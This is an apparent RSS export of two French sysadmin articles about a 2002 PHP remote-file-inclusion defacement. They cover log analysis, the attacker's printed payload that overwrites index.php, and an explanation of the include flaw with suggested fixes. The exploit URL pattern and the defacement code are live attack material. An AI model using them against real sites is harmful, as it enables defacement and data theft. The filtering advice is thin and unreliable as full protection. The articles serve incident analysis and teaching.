http://www.admin-sys.org/ Bienvenu sur le site admin-sys. fr SPIP - www.spip.net (Sarka-SPIP) https://admin-sys.org/local/cache-vignettes/L144xH55/siteon0-02f93.png?1694605449 http://www.admin-sys.org/ 55 144 https://admin-sys.org/?analyse-d-un-hacking https://admin-sys.org/?analyse-d-un-hacking 2009-04-22T14:53:08Z text/html fr Jerome ROBERT <p>Analyse d'un hacking ... Analyse de votre fichier de log de votre serveur WEB : grep 'file=http' access_log #nom de votre fichier de log #2.147.105.2#8 - - [31/Dec/2002:14:11:18 +0100] "GET /linux/index.php ?file=http://#####.sui#zer0.###/hack HTTP/1.1" 200 1430 "-" "Mozilla/4.0 (compatible ; MSIE 6.0 ; Windows NT 5.1)" #2.147.105.2#8 - - [31/Dec/2002:14:11:30 +0100] "GET / HTTP/1.1" 200 3869 (…)</p> - <a href="https://admin-sys.org/?-include-php-" rel="directory">include php</a> <div class='rss_texte'><br> <H1 ALIGN=CENTER>Analyse d'un hacking ...</H1> <P><BR><BR> </P> <H3>Analyse de votre fichier de log de votre serveur WEB:</H3> <P>grep 'file=http' access_log #nom de votre fichier de log</P> <TABLE WIDTH=100% BORDER=1 CELLPADDING=4 CELLSPACING=3 STYLE="page-break-inside: avoid"> <COL WIDTH=256*> <THEAD> <TR> <TD WIDTH=100% VALIGN=TOP> <P>#2.147.105.2#8 - - [31/Dec/2002:14:11:18 +0100] "GET /linux/index.php?file=http://#####.sui#zer0.###/hack HTTP/1.1" 200 1430 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" </P> <P>#2.147.105.2#8 - - [31/Dec/2002:14:11:30 +0100] "GET / HTTP/1.1" 200 3869 "http://www.admin-sys.com/linux/index.php?file=http://#####.sui#zer0.###/hack" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" </P> </TD> </TR> </THEAD> </TABLE> <P><BR><BR> </P> <P>Les # sont la pour respecter le hackeur ....</P> <P><BR><BR> </P> <H3>Analyse du résultat:</H3> <P>Nous avons @IP de la machine qui a servi a faire le hack: <B>#2.147.105.2#8</B></P> <P >Nous avons le site qui a aider a faire le hack: <B>http://#####.sui#zer0.###/</B></P> <P ><BR><BR> </P> <P >Avec <B>#2.147.105.2#8 </B><SPAN STYLE="font-weight: medium">et</SPAN><B> </B>les outils qui se trouvent dans « http//:www.admin-sys.com/reseaux/outils/ » Et en choisissent « Qui est le propriétaire de cette Adresse IP » Cela va vous permet de trouver le propriétaire de l'adresse IP donc le « provider » ( free, aol, ... ), avec l'heure, il est possible de contacter le responsable technique ,pour que ce dernier recherche dans ces logs des compléments informations qui seront utiles lors de la procédure judiciaires. ( s'il y a eu de gros problèmes ...)</P> <P >Avec <B>http://#####.sui#zer0.###/ </B>il est possible de connaître le responsable de ce domaine et demander des comptes sur l'un de ces comptes, car le site à pu être aussi pirater ...</P> <H2><B><U>Attention</U></B>: </H2> <P >On peut obtenir beaucoup d'information, mais <B>on ne sais pas</B> si c'est vraiment le <U>hackeur</U> ou un <U>pigeon</U> (victime d'un piratage).... Surtout s'il vient d'une machine WINDOWS .... </P> <P ><BR><BR> </P> <h2 >Soyez très prudent est regarder vos LOGs .....</h2> <P ><BR><BR> </P> <P >Voici les sources dans fichier de HACK ... </P> <P STYLE="margin-bottom: 0cm; font-weight: medium"><?php echo "en cours...<BR>"; $f = fopen("index.php", "w"); echo "Ouvert...<BR>"; $data = "<?php if(\$rub){header(\"location: _index.php?rub=\".\$rub);exit;} ?> </P> <PRE> __ __ _______ ______ __ __ _______ _____ ____ __ __ / / / / / ___ / / ____/ / / / / / _____/ / ___ \ / __ \ | | / / / /__/ / / /__/ / / / / /__/ / / /___ / / / / / /_/ / | |/ / / ___ / / ___ / / / / ___ < / ____/ / / / / / __ < | / / / / / / / / / / /___ / / | | / /____ / /__/ / / /_/ / / / /_/ /_/ /_/ /_/ /_____/ /_/ |_| /______/ /______/ /_____/ /_/ </PRE><H1> # </H1> <P><BR><BR>Ce site n'est pas mal, sauf une ch'tite faille de sécurité à boucher...<BR><BR>Monsieur l'admin, voyez le mail que je vous ai envoyé pour les détails et la correction de la faille...<BR><BR>Sur ce, faites tous attention à la sécurité de vos serveurs et de vos réseaux, car il y aura toujours un hacker<BR>pour trouver les failles de vos bécanes, et certains n'ont pas des intentions aussi bienvéillantes que les miennes ;)<BR>On dit merci qui ? merci e ! ;o)<BR><BR>Par ici l'entrée... et bonne année !</P> <P STYLE="margin-bottom: 0cm">e - le 31/12/2002 (oui je sais mon ASCII il est moche...)</P> <P STYLE="margin-bottom: 0cm">"; echo "Pret à ecrire...<BR>"; fputs($f, $data); echo "Ecrit...<BR>"; fclose($f); echo "<B>H@cked by e</B><BR>"; ?> </P></div> https://admin-sys.org/?faille-include https://admin-sys.org/?faille-include 2009-04-22T14:52:19Z text/html fr Jerome ROBERT <p>auteur : e Et si votre site contenait une grosse faille de sécurité : la faille include de php ???? Si vous avez des liens du type : http://www.site.com/linux/index.php?file=intro.php Alors pas problème ... Le problème est qu'il n'y a peut être pas de vérification sur $page avant l'include... donc si on fait http://www.site.com/linux/index.php?file=http://mon_site/hack et si le fichier hack sur mon site contient du code comme : < ?php $f=fopen("index.php", (…)</p> - <a href="https://admin-sys.org/?-include-php-" rel="directory">include php</a> <div class='rss_texte'><center> <p>auteur : <b> e</b></p> </center> <BR> <H3>Et si votre site contenait une grosse faille de sécurité : la faille include de php ????</H3> <BR> <p STYLE="margin-bottom: 0cm">Si vous avez des liens du type :</p> <BR> <p STYLE="margin-bottom: 0cm"><a href="http://www.site.com/linux/index.php?file=intro.php" class="spip_url spip_out auto" rel="nofollow external">http://www.site.com/linux/index.php?file=intro.php</a></p> <BR> <p STYLE="margin-bottom: 0cm">Alors pas problème ...</p> <p STYLE="margin-bottom: 0cm">Le problème est qu'il n'y a peut<br class='autobr' /> être pas de vérification sur $page avant l'include...</p> <p STYLE="margin-bottom: 0cm">donc si on fait<br class='autobr' /> <a href="http://www.site.com/linux/index.php?file=http://mon_site/hack" class="spip_url spip_out auto" rel="nofollow external">http://www.site.com/linux/index.php?file=http://mon_site/hack</a></p> <p STYLE="margin-bottom: 0cm">et si le fichier hack sur mon site<br class='autobr' /> contient du code comme :</p> <BR> <p STYLE="margin-bottom: 0cm">< ?php</p> <p STYLE="margin-bottom: 0cm">$f=fopen("index.php", "w") ;</p> <p STYLE="margin-bottom: 0cm">...</p> <p STYLE="margin-bottom: 0cm"> ?></p> <BR> <p STYLE="margin-bottom: 0cm">On est capable d'écrire sur<br class='autobr' /> l'index...</p> <p STYLE="margin-bottom: 0cm">Pour boucher cette faille, il fait<br class='autobr' /> faire des tests sur $page.</p> <BR> <p STYLE="margin-bottom: 0cm">Si vous n'incluez que des fichiers php,<br class='autobr' /> vous pouvez faire include($page.".php") comme ça les<br class='autobr' /> liens seront :</p> <BR> <p STYLE="margin-bottom: 0cm"><a href="http://www.site.com/linux/index.php?file=intro" class="spip_url spip_out auto" rel="nofollow external">http://www.site.com/linux/index.php?file=intro</a></p> <BR> <p STYLE="margin-bottom: 0cm">Dans tous les cas, il faut ABSOLUMENT<br class='autobr' /> refuser les $page contenant "http://" ou "www"<br class='autobr' /> !!!! pour éviter l'include à distance.</p> <p STYLE="margin-bottom: 0cm">Il existe bien d'autres méthodes<br class='autobr' /> de protection, je vous revoie sur internet, recherchez "faille<br class='autobr' /> include php protection" dans google...</p> <p STYLE="margin-bottom: 0cm">Cette faille est très sensible,<br class='autobr' /> car on peut accéder à toutes les sources de vos<br class='autobr' /> fichiers et y pécher des informations sensibles comme vos mots<br class='autobr' /> de passe mysql par exemple, ou obtenir TOUTE votre base de donnée,<br class='autobr' /> donc sur un site marchand toutes les informations des personnes<br class='autobr' /> enregistrées (login, mot de passe, email, etc...).</p> <BR> <BR> <p STYLE="margin-bottom: 0cm">Un exemple de teste a faire avant<br class='autobr' /> d'effectuer un include :</p> <BR> <p STYLE="margin-bottom: 0cm">if (strstr($file, "http://"))<br class='autobr' /> $file="index.php" ;</p> <BR></div>